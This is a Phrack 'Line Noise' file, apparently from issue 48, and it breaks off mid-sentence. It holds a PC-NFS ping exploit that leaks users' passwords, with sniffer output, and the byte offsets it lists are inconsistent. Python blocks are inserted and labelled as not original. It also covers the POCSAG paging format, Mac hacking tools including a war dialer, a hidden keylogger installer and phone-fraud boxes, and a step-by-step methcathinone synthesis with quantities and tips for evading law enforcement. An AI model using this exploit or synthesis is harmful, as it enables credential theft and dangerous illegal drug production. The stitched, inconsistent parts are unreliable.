==Phrack Magazine==

Volume Seven, Issue Forty-Eight, File 3 of 18


// // /\ // ====
// // //\\ // ====
==== // // \\/ ====

/\ // // \\ // /=== ====
//\\ // // // // \=\ ====
// \\/ \\ // // ===/ ====

Part I

------------------------------------------------------------------------------

PC-NFS Bug

I have found a nice little security hole in PC-NFS version 5.x. If you
ping a PC-NFS user with a packet size of between 1450 and 1480, the
PC's ICMP reply packet will divulge:

o The hostname of the PC
o The hostname of the PC's authentication server
o The username of the person logged in
o The password for the user (Thank you very much!)

All of this information is in clear text unless PC-NFS's NETLOGIN is
used. NETLOGIN uses XOR as its encryption, so this is hardly secure
either.

NDIS, ODI, 3C503 drivers on SMC and 3C503 cards have been tested
and all freely return the above information on both PC-NFS versions
5.0 and 5.1a. This should work with other driver/NIC configurations
also.

You get the occasional added bonus of locking up the victim's PC as
well!

This bug was new to Sun and they have created a new PCNFS.SYS
driver for us. They have labeled it PC-NFS.SYS version 5.1a.DOD.
This new version fills reply ICMP packets with nulls after 200 bytes of
the requested pattern.

Until you receive this patch from Sun, I would recommend setting all
external router interface MTU to a value of no greater than 1350 as this
is the point where secrets are contained in the return packet.

The Unix command to generate the below results is as follows:

ping -s -c1 pchost.victim.com 1480

Use your favorite sniffer to filter ICMP packets and you have it. If you
don't have a sniffer, try the -v(erbose) option of ping and convert the
hex to ascii starting around byte 1382.

Sniffer output follows:

19:03:48.81
ip: evil.com->pchost.victim.com
icmp: echo request

19:03:48.85
ip: pchost.victim.com->evil
icmp: echo reply
1382: p c h o s t 000 000 000 000
1392: 000 000 000 000 000 000 244 A @ -
1402: s e r v e r 1 000 000 000
1412: 000 000 000 000 000 000 244 A @ 001
1422: 000 000 000 000 000 000 000 000 000 000
1432: 000 000 000 000 000 000 244 A @ 001
1442: u s e r n a m e 000 000
1452: p a s s w d 000 000 000 000
1462: 000 000 000 000 000 000 000 000 000 000
1472: 000 000 000 000 000 000 000 000 000 000
1482: 000 000 200 000 k 000 260 271 377 377
1492: 344 275 9 212

The names have been changed to protect the innocent, but the rest is actual.

Byte 1382: PC's hostname
Byte 1402: PC's Authentication server hostname
Byte 1382: The user's account name. Shows nobody if logged out.
Byte 1382: The user's password.
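
A defensive check built on the behaviour described above, as an added example that is not part of the original article: an echo reply must mirror the request payload, so a reply whose tail differs and is not all nulls is returning memory the sender never supplied. It assumes the ICMP payloads have already been extracted from a capture; the sample payloads are constructed, use the article's placeholder names, and the function names are hypothetical.

```python
import string
from typing import NamedTuple, Optional

# Printable ASCII including space, excluding control whitespace.
PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")


class Finding(NamedTuple):
    verdict: str             # "faithful", "truncated", "null-padded" or "leak"
    offset: Optional[int]    # first payload offset where the reply differs
    strings: list            # (payload offset, text) runs in the divergent tail


def first_divergence(request: bytes, reply: bytes) -> Optional[int]:
    """Offset of the first byte where the reply stops mirroring the request."""
    for i, (sent, got) in enumerate(zip(request, reply)):
        if sent != got:
            return i
    if len(request) != len(reply):
        return min(len(request), len(reply))
    return None


def printable_runs(data: bytes, base: int, min_len: int = 4) -> list:
    """Return (offset, text) for each run of at least min_len printable bytes."""
    runs, start = [], None
    for i, byte in enumerate(data + b"\x00"):   # sentinel flushes the last run
        if byte in PRINTABLE:
            if start is None:
                start = i
        else:
            if start is not None and i - start >= min_len:
                runs.append((base + start, data[start:i].decode("ascii")))
            start = None
    return runs


def classify_reply(request: bytes, reply: bytes) -> Finding:
    """Classify an echo reply payload against the request that triggered it."""
    off = first_divergence(request, reply)
    if off is None:
        return Finding("faithful", None, [])
    tail = reply[off:]
    if not tail:
        return Finding("truncated", off, [])
    if not any(tail):
        # Behaviour the article attributes to the fixed driver: nulls after
        # the first part of the requested pattern.
        return Finding("null-padded", off, [])
    return Finding("leak", off, printable_runs(tail, off))


def field(name: bytes, width: int) -> bytes:
    """NUL-padded fixed-width field, as seen in the dump's tail."""
    return name.ljust(width, b"\x00")


# Constructed sample data. Offsets here are relative to the ICMP payload,
# not the frame offsets printed by the sniffer in the article.
REQUEST = bytes(i & 0xFF for i in range(1438))          # incrementing pattern
LEAKY = (REQUEST[:200] + bytes(1120)
         + field(b"pchost", 20) + field(b"server1", 40)
         + field(b"username", 10) + field(b"passwd", 48))
PATCHED = REQUEST[:200] + bytes(1238)

if __name__ == "__main__":
    for label, reply in (("unpatched", LEAKY), ("patched", PATCHED)):
        result = classify_reply(REQUEST, reply)
        print(label, result.verdict, result.offset, result.strings)
```
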

------------------------------------------------------------------------------

POCSAG paging format, code and code capacity

The POCSAG (Post Office Code Standardization Advisory Group) code is a
synchronous paging format that allows pages to be transmitted in a SINGLE-BATCH
structure. The POCSAG code provides improved battery-saving capability and an
increased code capacity.
The POCSAG code format consists of a preamble and one or more batches of
codewords. Each batch comprises a 32-bit frame synchronization code and eight
64-bit address frames of two 32-bit addresses or idle codewords each. The
frame synchronization code marks the start of the batch of codewords.

-PREAMBLE STRUCTURE
The preamble consists of 576 bits of an alternating 101010 pattern transmitted
at a bit rate of 512 or 1200 bps. The decoder uses the preamble both to
determine if the data received is a POCSAG signal and for synchronization with
the stream of data.

       |---Preamble----|-----------First Batch-------------|--Subsec. Batch--|

        ______________________________________________________< <____________
paging |  576 bits of  | | | | | | | | | | | | | | | | | | |  > >            |
format |   reversals   |F| | | | | | | | | | | | | | | | |F|                 |
       | (101010, etc) |S| | | | | | | | | | | | | | | | |S|                 |
       |_______________|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|__< <____________|
                                                              > >
                           1 FRAME = 2 CODEWORDS

                 Preamble      Batches

    512 BPS      1125 mS       1062.5 mS

    1200 BPS     480 mS        453.3 mS

                          CodeWords Structure
        ____________________________________________________________________
BIT    |   |              |       |                       |                 |
NUMBER | 1 |   2 to 19    | 20,21 |       22 to 31        |       32        |
       |___|______________|_______|_______________________|_________________|
        ____________________________________________________________________
ADDRESS|   |              |       |                       |                 |
FORMAT | 0 | Address Bits | S I B |   Parity Check Bits   |   Even parity   |
       |___|______________|_______|_______________________|_________________|
                              ^
                   Source identifier bits
        ____________________________________________________________________
MESSAGE|   |                      |                       |                 |
FORMAT | 1 |     Message Bits     |   Parity Check Bits   |   Even parity   |
       |___|______________________|_______________________|_________________|

-BATCH STRUCTURE
A batch consists of a frame synchronization code followed by 8 frames of two address
codewords per frame (16 address codewords per batch). In order to maintain the
proper batch structure, each frame is filled with two address codewords, or two
idle codewords, or two message codewords, or any appropriate combination of the
three codeword types.

-FRAME SYNCHRONIZATION CODE STRUCTURE
The frame synchronization (FS) code is a unique, reserved word that is used to
identify the beginning of each batch. The FS code comprises the 32 bits:

011111100110100100001010111011000.

-OPTIONAL ALTERNATE FRAME SYNCHRONIZATION CODEWORDS
An alternate frame synchronization (AFS) code can be selected to support special
systems or systems that require increased coding capability. The AFS is
generated in the same manner as an address codeword (i.e., BCH codeword with
parity bits). The POCSAG signaling standard has reserved special codewords for
the AFS from 2,000,000 to 2,097,151. The use of the AFS requires the paging
system to support the AFS. The AFS will change to frame 0 on the programmer
since no frame information is included in the AFS. The AFS should use address
1 so that bit 20 and 21 are 0.

-ADDRESS CODEWORD STRUCTURE
An address codeword's first bit (bit 1) is always a zero. Bits 2 through 19 are
the address bits. The pager looks at these bits to find its own unique
address. Each POCSAG codeword is capable of providing address information for
four different paging sources (Address 1 to 4). These addresses are determined
by combinations of values of bits 20 and 21 (the source-identifier bits). Bits
22 through 31 are the parity check bits, and bit 32 is the even parity bit.

            BIT 20   BIT 21
Address 1     0        0
Address 2     0        1
Address 3     1        0
Address 4     1        1

Pre-coded into the code plug are three bits which designate the frame location,
within each batch, at which the pager's address is to be received; the decoder
will look at the codewords in this frame for its address.
Power is removed from the receiver during all frames other than the precoded
one, thus extending pager battery life.

-CODE CAPACITY
The combination of the code plug's three pre-coded frame location bits and
address codeword's 18 address bits provides over two million different
assignable codes. In this combination, the frame location bits are the
least-significant bits, and the address bits are the most-significant bits.

-MESSAGE CODEWORD STRUCTURE
A message codeword structure always starts with a 1 in bit 1 and always follows
directly after the address. Each message codeword replaces an address codeword
in the batch.

-IDLE CODEWORD STRUCTURE
The idle codeword is a unique, reserved codeword used to take the place of an address
in any frame that would not otherwise be filled with 64 bits.
Thus, if a frame contains only an address, an idle codeword comprises the 32
bits:

01111010100010011100000110010111
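
The codeword layout and code capacity described above, as an added example that is not part of the original article: it builds and checks 32-bit codewords and splits a 21-bit pager code into its frame-location and address bits. The BCH(31,21) generator polynomial comes from the POCSAG standard and does not appear in the text; the function names are hypothetical.

```python
# BCH(31,21) generator used by POCSAG: x^10 + x^9 + x^8 + x^6 + x^5 + x^3 + 1.
# Assumption: taken from the POCSAG standard, not from the article.
BCH_GEN = 0b11101101001

# Idle codeword exactly as quoted in the article.
IDLE_CODEWORD = 0b01111010100010011100000110010111

# 3 frame-location bits + 18 address bits = 21-bit pager code.
MAX_PAGER_CODE = (1 << 21) - 1


def bch_parity(data21: int) -> int:
    """Return the 10 parity check bits (bits 22-31) for bits 1-21."""
    reg = data21 << 10
    for shift in range(20, -1, -1):          # polynomial long division
        if reg & (1 << (shift + 10)):
            reg ^= BCH_GEN << shift
    return reg & 0x3FF


def make_codeword(data21: int) -> int:
    """Append BCH check bits and the even-parity bit (bit 32)."""
    word = (data21 << 11) | (bch_parity(data21) << 1)
    return word | (bin(word).count("1") & 1)


def is_valid(codeword: int) -> bool:
    """True when both the BCH check bits and the even parity bit agree."""
    return make_codeword(codeword >> 11) == codeword


def encode_address(pager_code: int, source: int):
    """Return (frame, address codeword) for a pager code and Address 1-4."""
    if not 0 <= pager_code <= MAX_PAGER_CODE:
        raise ValueError("pager code must fit in 21 bits")
    if source not in (1, 2, 3, 4):
        raise ValueError("source must be Address 1 to 4")
    frame = pager_code & 0b111               # least-significant 3 bits
    addr18 = pager_code >> 3                 # most-significant 18 bits
    data21 = (addr18 << 2) | (source - 1)    # bit 1 stays 0 for an address
    return frame, make_codeword(data21)


def decode_codeword(codeword: int, frame: int = 0) -> dict:
    """Classify a codeword; 'frame' is the batch frame it was received in."""
    if codeword == IDLE_CODEWORD:
        return {"kind": "idle", "valid": True}
    valid = is_valid(codeword)
    data21 = codeword >> 11
    if data21 >> 20:                         # bit 1 set: message codeword
        return {"kind": "message", "valid": valid, "bits": data21 & 0xFFFFF}
    return {"kind": "address", "valid": valid,
            "pager_code": ((data21 >> 2) << 3) | frame,
            "source": (data21 & 0b11) + 1}


if __name__ == "__main__":
    frame, word = encode_address(1234567, 3)
    print(frame, format(word, "032b"), decode_codeword(word, frame))
    print("idle codeword passes checks:", is_valid(IDLE_CODEWORD))
```
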

-POCSAG CHARACTERS

CHAR  HEX  |  CHAR  HEX  |  CHAR  HEX  |
           |             |             |
 #    23   |   $    24   |   @    40   |
 [    5B   |   \    5C   |   ]    5D   |
 ^    5E   |   _    5F   |   '    60   |
 {    7B   |   |    7C   |   }    7D   |
 ~    7E   |  DEL   7F   |   SP   20   |

------------------------------------------------------------------------------

MACINTOSH HACKING
by Logik Bomb

"My fellow astronauts..."
-Dan Quayle

Now, two people have mailed Erik Bloodaxe asking about Macintosh
hacking particularly war dialers, and each time he insulted Macs and tried
to get someone to write a file on it. No one has done it. So I guess I have
to.
First, some words on Macintoshes. Steve Jobs and Steve Wozniak, the
originators of the Apple and the Macintosh were busted for phreaking in
college. The Apple IIe was used almost universally by hackers. So why has
the Mac fallen out of favor for hacking? Simple. Because it fell out of
favor for everything else. Apple screwed up and wouldn't let clone makers
license the MacOS. As a result, 80% of personal computers run DOS, and
Macintoshes are left in the minority. Second, DOS compatible users, and
hackers in particular, have an image of Mac users as a bunch of whiny
lamers who paid too much for a computer and as a result are constantly
defensive. The solution to this impression is to not be an asshole. I know
it drives every Mac user crazy when he reads some article about Windows
95's brand new, advanced features such as "plug-and-play" that the
Macintosh has had since 1984. But just try and take it. If it's any
consolation, a lot of IBM-compatible (a huge misnomer, by the way) users
hate Windows too.
Now, on with the software.
-------------------------
Assault Dialer 1.5
Assault Dialer, by Crush Commando, is the premier Mac war dialer,
the Mac's answer to ToneLoc. It has an ugly interface, but it's the best we
have right now. It is the successor to a previous war dialer known as Holy
War Dialer 2.0. The only real competitor I've heard of for Assault Dialer
is Tyrxis Shockwave 2.0, but the only version I could get a hold of was
1.0, and it wasn't as good as Assault Dialer, so that's your best bet right
now.

MacPGP 2.6.2 and PGPfone 1.0b4
MacPGP is the Macintosh port of the infamous PGP (Pretty Good
Privacy.) This file is not about cryptography, so if you want to know about
PGP read the fuckin' read me and docs that come with the file. Strangely
enough, however, Phil Zimmermann released PGPfone, a utility for encrypting
your phone and making it a secure line, for the Mac _first._ I don't know
why, and I haven't had a chance to test it, but the idea's pretty cool. If
PGP doesn't get Zimmermann thrown in jail, this will.

DisEase 1.0 and DisEase 3.0
Schools and concerned parents have always had a problem. Schools
can't have students deleting the hard drive, and parents don't want their
kids looking at the kinky pictures they downloaded. So Apple came out with
At Ease, an operating system that runs over System 7, sort of the same way
Windows runs off of DOS. However, I can't stand At Ease. Everything about
it, from the Fisher-Price screen to the interface drives me crazy. It
drives a lot of other people crazy too. So it was just a matter of time
before someone made a program to override it. The first was DisEase 1.0, a
small program by someone calling himself Omletman, that would override At
Ease if you put in a floppy loaded with it and clicked six times. Omletman
improved this design and eventually released 3.0. (I haven't been able to
find any evidence that a 2.0 was ever released) 3.0 has such cool features
as reading the preferences file to give you the password, so you can change
the obnoxious greeting teachers always put to something more sinister. The
only problem with 3.0 is that some configurations of At Ease only let
documents be read off of disks; no applications, which means DisEase 3.0
won't appear, and so you can't run it. However, with 1.0 you don't have to
actually open the application, you just click six times, so if you use 1.0
to get to the finder, and then 3.0 to read the passwords, things will work.

Invisible Oasis Installer
Oasis is a keystroke recorder, so you can find out passwords.
However, with the original Oasis, you had to put it in the Extensions
folder and make it invisible with ResEdit, which takes a while. Invisible
Oasis Installer, however, installs it where it should be and automatically
makes it invisible.
"So everything's wrapped up in a nice neat little _package_, then?"
-Homer Simpson

Anonymity 2.0 and Repersonalize 1.0
Anonymity, version 1.2, was a rather old program whose author has
long been forgotten that was the best data fork alterer available. It
removed the personalization to programs. However, in around 1990 someone
named the Doctor made 2.0, a version with some improvements. Repersonalize
was made in 1988 (God, Mac hacking programs are old) which reset
personalization on some of the Microsoft and Claris programs, so you could
enter a different personalization name. I don't know if it will still work
on Microsoft Word 6.0.1 and versions of programs released recently, but I
don't really care because I use Word 5.1a and I'm probably not going to
upgrade for a while.

Phoney (AKA Phoney4Mac)
Phoney is an excellent program that emulates the Blue Box, Red Box,
Black Box and Green Box tones. There is also Phoney4Newton, which does the
same thing on the most portable of computers, the Newton.

That's all I'm covering in this file as far as Mac hacking
programs. You'll probably want to know where to find all this crap, so here
are all of the Mac hacking ftp and Web sites I know of:
Space Rogue's Whacked Mac Archives (http://l0pht.com/~spacerog/index.html)
This site, run by Space Rogue is L0pht Heavy Industries' Mac site.
It is probably the largest and best archive of Mac hacking software
connected to the Internet. The problem with this is that it can't handle
more than two anonymous users, meaning that unless you pay to be part of
L0pht, you will never get into this archive. I've tried getting up at 4:30
AM, thinking that no one in their right mind would possibly be awake at
this time, but there is always, somehow, somewhere, two people in Iceland
or Singapore or somewhere on this site.
The Mac Hacking Home Page (http://www.aloha.com/~seanw/index.html)
This site does not look like much, and it is fairly obvious that
its maintainer, Sean Warren, is still learning HTML, but it is reliable and
is a good archive. It is still growing, probably due to the fact that it is
one of the only Internet Mac hacking sites anyone can get to and upload.
Kn0wledge Phreak <k0p> (http://www.uccs.edu/~abusby/k0p.html)
This is an excellent site and has many good programs. There is one
catch, however. Its maintainer, Ole Buzzard, is actually getting the files
from his BBS. So many of the really good files are locked away in the k0p
BBS, and those of us who can't pay long distance can't get the files. Oh
well.
Bone's H/P/C Page o' rama- part of the Cyber Rights Now! home page
(http://www.lib.iup.edu/~seaman/index.html)
While this is hardly a Macintosh hacking site, it's just a hacking
site, it does have very few Mac files, some of which are hard to get to.
However, Bone might get expelled because of a long story involving AOHell,
so this page might not be here. Then again, maybe Bone won't get expelled
and this site will stay. Never can tell 'bout the future, can you?
"We predict the future. We invent it."
-Nasty government guy on the season premiere of _The X-Files_

Andy Ryder
Netsurfer and Road Warrior on the Info Highway
I've pestered Bruce Sterling _and_ R.U. Sirius!
As mentioned in the alt.devilbunnies FAQ, part I (Look it up!)
Once scored 29,013,920 points on Missile Command

"This Snow Crash thing- is it a virus, a drug, or a religion?"
-Hiro Protagonist
"What's the difference?"
-Juanita Marquez

"...one person's 'cyberpunk' is another's everyday obnoxious teenager with
some technical skill thrown in..."
-Erich Schneider, "alt.cyberpunk Frequently Asked Questions List"
"More than _some_ technical skill."
-Andy Ryder

------------------------------------------------------------------------------
|
|||
|
|
|||
|
Making Methcathinone
|
|||
|
|
|||
|
Compiled
|
|||
|
|
|||
|
by Anonymous
|
|||
|
|
|||
|
|
|||
|
Ok, this has got to be the easiest drug made at home (by far). This is very
|
|||
|
similar to methamphetamine in structure, effect, and use. Typical doses
|
|||
|
start at 20mg up to 60mg. Start low, go slow. Cat can be taken orally (add
|
|||
|
10 mg) or through mucous membranes (nasally).
|
|||
|
|
|||
|
Ingredients:
|
|||
|
Diet pills, or bronchodilator pills (1000 ea) containing 25mg ephedrine.
|
|||
|
Potassium chromate, or dichromate (easily gotten from chem lab. orange/red)
|
|||
|
Conc. Sulfuric acid - it's up to you where you get this. Contact me if you
|
|||
|
need help locating it.
|
|||
|
Hydrochloric acid or Muriatic acid - Pool supply stores, hardware stores, it
|
|||
|
is used for cleaning concrete.
|
|||
|
Sodium Hydroxide - Hardware stores. AKA lye.
|
|||
|
Toluene - Hardware store, paint store.
|
|||
|
|
|||
|
Lab equipment:
|
|||
|
1 liter, 3 neck flask - get it from school or Edmund's Scientific ($20.00)
|
|||
|
125 mL separatory funnel - same as above
|
|||
|
glass tubing - same as above
|
|||
|
|
|||
|
Buchner funnel - This is a hard to find item, but must schools have at least
|
|||
|
one. They are usually white porcelain or plastic. They look
|
|||
|
like a funnel with a flat disk in the bottom with lots of
|
|||
|
holes in it. If you need one, arrangements can be made.
|
|||
|
Aspirator or vacuum pump - Any lab-ware supply catalog, about $10.00
|
|||
|
|
|||
|
References to Edmund's Scientific Co, in NJ, are accurate. You have to go
|
|||
|
to their "Lab Surplus/Mad Scientist" room. The prices are incredible.
|
|||
|
This place is definitely a recommended stopping sight for anybody going
|
|||
|
through New Jersey. It is located in "Barrington", about 30 minutes from
|
|||
|
center city Philadelphia.
|
|||
|
All of the above can be purchased from "The Al-Chymist". Their number is
|
|||
|
(619)948-4150. Their address is: 17525 Alder #49
|
|||
|
Hesperia, Ca 92345
|
|||
|
Call and ask for a catalog.
|
|||
|
|
|||
|
That's it. The body of this article is stolen from the third edition of
|
|||
|
"Secrets of Methamphetamine Manufacture" by Uncle Fester. This is a tried
|
|||
|
and proven method by many people. If you want a copy of this book, contact
|
|||
|
me.
|
|||
|
|
|||
|
Good luck and keep away from the DEA
|
|||
|
|
|||
|
|
|||
|
M E T H C A T H I N O N E
|
|||
|
|
|||
|
K I T C H E N I M P R O V I E S E D C R A N K
|
|||
|
|
|||
|
|
|||
|
The latest designer variant upon the amphetamine molecule to gain
|
|||
|
popularity and publicity is methcathinone, commonly called cat. This
|
|||
|
substance is remarkably similar to the active ingredient found in the
|
|||
|
leaves of the khat tree which the loyal drug warriors on the network news
|
|||
|
blame for turning peace loving Somalis into murderous psychopaths. The
|
|||
|
active ingredient in the khat leaves is cathinone, which has the same
|
|||
|
structural relationship to methcathinone that amphetamine has to
|
|||
|
methamphetamine. It is made by oxidizing ephedrine, while meth can be
|
|||
|
made by reducing ephedrine.
|
|||
|
|
|||
|
The high produced by methcathinone is in many ways similar to
|
|||
|
methamphetamine. For something so easily made and purified, it is
|
|||
|
actually quite enjoyable. the main differences between the meth high and
|
|||
|
the methcathinone high are length of action and body fell. With
|
|||
|
methcathinone, one can expect to still get to sleep about 8 hours after a
|
|||
|
large dose. On the down side, it definitely gives me the impression that
|
|||
|
the substance raises the blood pressure quite markedly. This drug may not
|
|||
|
be safe for people with weak hearts of blood vessels. Be warned!
|
|||
|
|
|||
|
Cat is best made using chrome in the +6 oxidation state as the
|
|||
|
oxidizer. I recall seeing an article in the narco swine's Journal of
|
|||
|
Forensic Science bragging about how they worked out a method for making it
|
|||
|
using permanganate, but that method gives an impure product in low yields.
|
|||
|
Any of the common hexavalent chrome salts can be used as the oxidizer in
|
|||
|
this reaction. This list include chrome trioxide (CrO3), sodium or
|
|||
|
potassium chromate (Na2CrO4), and sodium or potassium dichromate
|
|||
|
(Na2Cr2O7). All of these chemicals are very common. Chrome trioxide is
|
|||
|
used in great quantities in chrome plating. The chromates are used in
|
|||
|
tanning and leather making.
|
|||
|
|
|||
|
To make methcathinone, the chemist starts with the water extract of
|
|||
|
ephedrine pills. The concentration of the reactants in this case is not
|
|||
|
critically important, so it is most convenient to use the water extract of
|
|||
|
the pills directly after filtering without any boiling away of the water.
|
|||
|
See the section at the beginning of Chapter 15 [I included this at the end
|
|||
|
of the file] on extracting ephedrine form pills. Both ephedrine
|
|||
|
hydrochloride and sulfate can be used in this reaction.
|
|||
|
|
|||
|
The water extract of 1000 ephedrine pills is placed into any
|
|||
|
convenient glass container. A large measuring cup is probably best since
|
|||
|
it has a pouring lip. Next, 75 grams of any of the above mentioned +6
|
|||
|
chrome compounds are added. They dissolve quite easily to form a reddish
|
|||
|
or orange colored solution. Finally, concentrated sulfuric acid is added.
|
|||
|
If CrO3 is being used, 21 mL is enough for the job. If one of the
|
|||
|
chromates is being used, 42 mL is called for. These ingredients are
|
|||
|
thoroughly mixed together, and allowed to sit for several hours with
|
|||
|
occasional stirring.
|
|||
|
|
|||
|
After several hours have passed, lye solution is added to the batch
|
|||
|
until it is strongly basic. Very strong stirring accompanies this process
|
|||
|
to ensure that the cat is converted to the free base. Next, the batch is
|
|||
|
poured into a sep funnel, and a couple hundred mLs of toluene is added.
|
|||
|
Vigorous shaking, as usual, extracts the cat into the toluene layer. It
|
|||
|
should be clear to pale yellow in color. The water layer should be orange
|
|||
|
mixed with green. The green may settle out as a heavy sludge. The water
|
|||
|
layer is thrown away, and the toluene layer containing the cat is washed
|
|||
|
once with water, then poured into a beaker. Dry HCl gas is passed through
|
|||
|
the toluene as described in Chapter 5 [I included this at the end of the file]
|
|||
|
to get white crystals of cat. The yield is between 15 and 20
|
|||
|
grams. This reaction is scaled up quite easily.
|
|||
|
|
|||
|
|
|||
|
CHAPTER 15 (part of it anyway)
|
|||
|
|
|||
|
P R O C E D U R E F O R O B T A I N I N G P U R E E P H E D R I N E
|
|||
|
F R O M S T I M U L A N T P I L L S
|
|||
|
|
|||
|
In the present chemical supply environment, the best routes for making
|
|||
|
meth start with ephedrine as the raw material. To use these routes, a
|
|||
|
serious hurdle must first be overcome. This hurdle is the fact that the
|
|||
|
most easily obtained source of ephedrine, the so-called stimulant or
|
|||
|
bronchodilator pills available cheaply by mail order, are a far cry from
|
|||
|
the pure starting material a quality minded chemist craves. Luckily,
|
|||
|
there is a simple and very low profile method for separating the fillers
|
|||
|
in these pills from the desired active ingredient they contain.
|
|||
|
|
|||
|
A superficial paging through many popular magazines[New Body is where
|
|||
|
I found it at GNC] reveals them to be brim full of ads
|
|||
|
from mail order outfits offering for sale "stimulant" or "bronchodilator"
|
|||
|
pills. These are the raw materials today's clandestine operator requires
|
|||
|
to manufacture meth without detection. The crank maker can hide amongst
|
|||
|
the huge herd of people who order these pills for the irritating and
|
|||
|
nauseating high that can be had by eating them as is. I have heard of a
|
|||
|
few cases where search warrants were obtained against people who ordered
|
|||
|
very large numbers of these pills, but I would think that orders of up to
|
|||
|
a few thousand pills would pass unnoticed. If larger numbers are
|
|||
|
required, maybe one's friends could join in the effort.
|
|||
|
|
|||
|
The first thing one notices when scanning these ads is the large
|
|||
|
variety of pills offered for sale. When one's purpose is to convert them
|
|||
|
into methamphetamine, it is very easy to eliminate most of the pills
|
|||
|
offered for sale. Colored pills are automatically rejected because one
|
|||
|
does not want the coloring to be carried into the product. Similarly,
|
|||
|
capsules are rejected because individually cutting open capsules is just
|
|||
|
too much work. Bulky pills are to be avoided because they contain too much
|
|||
|
filler. The correct choice is white cross thins, preferably containing
|
|||
|
ephedrine HCl instead of sulfate, because the HCl salt can be used in more
|
|||
|
of the reduction routes than can the sulfate.
|
|||
|
|
|||
|
Once the desired supply of pills is in hand, the first thing which
|
|||
|
should be done is to weigh them. This will give the manufacturer an idea
|
|||
|
of how much of the pills is filler, and how much is active ingredient.
|
|||
|
Since each pill contains 25 milligrams of ephedrine HCl, a 1000 lot bottle
|
|||
|
contains 25 grams of active ingredient. A good brand of white cross thins
|
|||
|
will be around 33% to 40% active ingredient. 25 grams of ephedrine HCl
|
|||
|
may not sound like much, but if it is all recovered from these pills, it
|
|||
|
is enough to make from 1/2 to 3/4 ounce of pure meth. This is worth three
|
|||
|
or four thousand dollars, not a bad return on the twenty odd dollars a
|
|||
|
thousand lot of such pills costs. [I don't know where he got 3 or 4
|
|||
|
thousand dollars from, but the pills go for about $35.00/1000 now. 2
|
|||
|
months ago they were $25.00 but now they have to do more paper work
|
|||
|
because it is a DEA controlled substance]
|
|||
|
|
|||
|
To extract the ephedrine from the pills, the first thing which must be
|
|||
|
done is to grind them into a fine powder. This pulverization must be
|
|||
|
thorough in order to ensure complete extraction of the ephedrine form the
|
|||
|
filler matrix in which it is bound. A blender does a fine job of this
|
|||
|
procedure, as will certain brands of home coffee grinders.
|
|||
|
|
|||
|
Next, the powder from 1000 pills is put into a glass beaker, or other
|
|||
|
similar container having a pouring lip, and about 300 mL of distilled
|
|||
|
water is added. Gentle heat is then applied to the beaker, as for example
|
|||
|
on a stove burner, and with steady stirring the contents of the beaker are
|
|||
|
slowly brought up to a gentle boil. It is necessary to stir constantly
|
|||
|
because of the fillers will settle to the bottom of the beaker and cause
|
|||
|
burning if not steadily stirred.
|
|||
|
|
|||
|
Once the contents of the beaker have been brought to a boil, it is
|
|||
|
removed from the heat and allowed to settle. Then the water is poured out
|
|||
|
of the beaker through a piece of filter paper. The filtered water should
|
|||
|
be absolutely clear. Next, another 50 mL of water is added to the pill
|
|||
|
filler sludge, and it too is heated with stirring. Finally, the pill
|
|||
|
sludge is poured into the filter, and the water it contains is allowed to
|
|||
|
filter through. It too should be absolutely clear, and should be mixed in
|
|||
|
with the first extract. A little water may be poured over the top of the
|
|||
|
filler sludge to get the last of the ephedrine out of it. This sludge
|
|||
|
should be nearly tasteless, and gritty in texture. The water extract
|
|||
|
should taste very bitter, as it contains the ephedrine.
|
|||
|
|
|||
|
The filtered water is now returned to the stove burner, and half of
|
|||
|
the water it contains is gently boiled away. Once this much water has
|
|||
|
been boiled off, precautions should be taken to avoid burning the
|
|||
|
ephedrine. The best alternative is to evaporate the water off under a
|
|||
|
vacuum. If this is not practical with the equipment on hand, the water
|
|||
|
may be poured into a glass baking dish. This dish is then put into the
|
|||
|
oven with the door cracked open, and the lowest heat applied. In no time
|
|||
|
at all, dry crystals of ephedrine HCl can be scraped out of the baking
|
|||
|
dish with a razor blade. The serious kitchen experimenter may wish to
|
|||
|
further dry them in a microwave.
|
|||
|
|
|||
|
Chapter 5 (The part about the HCl gas)
|
|||
|
|
|||
|
A source of anhydrous hydrogen chloride gas is now needed. The
|
|||
|
chemist will generate his own. The glassware is set up as in Figure 1.
|
|||
|
He will have to bend another piece of glass tubing to the shape shown. It
|
|||
|
should start out about 18 inches long. One end of it should be pushed
|
|||
|
through a one hole stopper. A 125 mL sep funnel is the best size. The
|
|||
|
stoppers and joints must be tight, since pressure must develop inside this
|
|||
|
flask to force the hydrogen chloride gas out through the tubing as it is
|
|||
|
generated.
|
|||
|
|
|||
|
Into the 1000 mL, three-necked flask is placed 200 grams of table
|
|||
|
salt. Then 25% concentrated hydrochloric acid is added to this flask until
|
|||
|
it reaches the level shown in the figure. The hydrochloric acid must be
|
|||
|
of laboratory grade [I use regular muriatic acid for pools].
|
|||
|
|
|||
|
Figure 1:
|
|||
|
\ /
|
|||
|
\ /ķ
|
|||
|
ֽ ӷ <--125 mL separatory funnel
|
|||
|
|
|||
|
|
|||
|
ӷ ֽ
|
|||
|
ķ Ľ glass tubing Ŀ
|
|||
|
ӷ ֽ
|
|||
|
ͻ
|
|||
|
stopcock->ۺĴ Salt and Hydrochloric acid
|
|||
|
stopper ->ķ \/з ķ <-1 hole mixed into a paste by add-
|
|||
|
ĺ ĺ stopper ing HCL to salt and mixing.
|
|||
|
Ľ Ľ Ľ ķ The surface should be rough
|
|||
|
ֽ ӷ and a good number of holes
|
|||
|
should be poked into the
|
|||
|
1000 mL, 3 neck flask paste for long lasting
|
|||
|
generation of HCl gas.
|
|||
|
ӷ acid/salt level ֽ
|
|||
|
ķ Ľ
|
|||
|
ķ Ľ
|
|||
|
ķ Ľ
|
|||
|
Ľ
|
|||
|
|
|||
|
|
|||
|
Some concentrated sulfuric acid (96-98%) is put into the sep funnel
|
|||
|
and the spigot turned so that 1 mL of concentrated sulfuric acid flows
|
|||
|
into the flask. It dehydrates the hydrochloric acid and produces hydrogen
|
|||
|
chloride gas. This gas is then forced by pressure through the glass
|
|||
|
tubing.
|
|||
|
|
|||
|
One of the Erlenmeyer flasks containing methamphetamine in solvent is
|
|||
|
placed so that the glass tubing extends into the methamphetamine, almost
|
|||
|
reaching the bottom of the flask. Dripping in more sulfuric acid as
|
|||
|
needed keeps the flow of gas going to the methamphetamine. If the flow if
|
|||
|
gas is not maintained, the methamphetamine may solidify inside the glass
|
|||
|
tubing, plugging it up.
|
|||
|
|
|||
|
Within a minute of bubbling, white crystals begin to appear in the
|
|||
|
solution, More and more of them appear as the process continues. It is an
|
|||
|
